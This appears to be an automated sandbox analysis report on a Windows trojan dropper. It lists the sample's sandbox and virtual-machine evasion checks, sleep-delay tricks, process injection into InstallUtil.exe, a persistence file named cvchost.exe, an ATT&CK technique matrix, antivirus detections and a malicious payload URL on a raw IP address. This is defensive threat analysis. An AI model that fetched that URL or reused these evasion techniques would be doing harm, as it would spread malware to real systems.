                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: seniorcommunicate.exe PID: 6752, type: MEMORYSTR
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeMemory allocated: 1940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeMemory allocated: 1980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 48C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeWindow / User API: threadDelayed 6898Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeWindow / User API: threadDelayed 2663Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2345
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4784Thread sleep count: 6898 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4784Thread sleep count: 2663 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99875s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99641s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99531s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99422s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -99063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98944s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98840s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98729s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98625s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98459s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98344s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98213s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -98076s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97968s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97857s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97750s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97640s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97530s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97422s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97313s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97188s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -97063s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96952s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96843s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96733s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96625s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96515s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96405s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96296s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96186s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -96077s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -95969s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -95857s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -95749s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -95638s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -95522s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -95196s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -95088s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -94966s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -94859s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -94749s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 4396Thread sleep time: -94640s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 6748Thread sleep count: 31 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe TID: 6748Thread sleep time: -30969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF71D1D204C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D64E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00007FF71D1D64E4
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99875Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99641Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99531Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99422Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99313Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99188Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 99063Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98944Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98840Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98729Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98625Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98459Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98344Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98213Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 98076Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97968Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97857Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97750Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97640Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97530Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97422Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97313Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97188Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 97063Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96952Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96843Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96733Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96625Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96515Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96405Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96296Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96186Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 96077Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 95969Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 95857Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 95749Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 95638Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 95522Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 95196Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 95088Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 94966Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 94859Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 94749Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeThread delayed: delay time: 94640Jump to behavior
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: seniorcommunicate.exe, 00000001.00000002.2522998831.0000000001515000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF71D1D1D28
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D8494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF71D1D8494
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D8790 SetUnhandledExceptionFilter,0_2_00007FF71D1D8790
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D11CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF71D1D11CC
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D8964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF71D1D8964
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF71D1D2C54
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting
                  Valid Accounts2
                  Native API
                  1
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Data Obfuscation
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Scheduled Task/Job
                  11
                  Process Injection
                  1
                  Obfuscated Files or Information
                  Security Account Manager16
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron21
                  Registry Run Keys / Startup Folder
                  1
                  Scheduled Task/Job
                  2
                  Software Packing
                  NTDS211
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture1
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                  Registry Run Keys / Startup Folder
                  1
                  Timestomp
                  LSA Secrets1
                  Process Discovery
                  SSHKeylogging1
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials41
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                  Virtualization/Sandbox Evasion
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Rundll32
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.FileRepMalware.3248.17662.exe47%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                  SecuriteInfo.com.FileRepMalware.3248.17662.exe100%AviraHEUR/AGEN.1323683
                  SecuriteInfo.com.FileRepMalware.3248.17662.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe100%AviraHEUR/AGEN.1323683
                  C:\Users\user\AppData\Local\cvchost.exe100%AviraHEUR/AGEN.1323683
                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\cvchost.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
                  C:\Users\user\AppData\Local\cvchost.exe29%ReversingLabsByteCode-MSIL.Trojan.Generic
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                  http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                  https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                  http://ocsp.thawte.com00%URL Reputationsafe
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  http://46.8.237.66/spool01/Rhxkjsv.pdftrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://github.com/mgravell/protobuf-netseniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                      unknown
                      https://github.com/mgravell/protobuf-netiseniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                        unknown
                        https://stackoverflow.com/q/14436606/23354seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        unknown
                        https://github.com/mgravell/protobuf-netJseniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmptrue
                          unknown
                          http://46.8.237.66/spool01/Rhxkjsv.pdfVSecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000000.2106899462.0000000000FB2000.00000002.00000001.01000000.00000004.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drtrue
                            unknown
                            http://crl.thawte.com/ThawteTimestampingCA.crl0SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drtrue
                            • URL Reputation: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameseniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            unknown
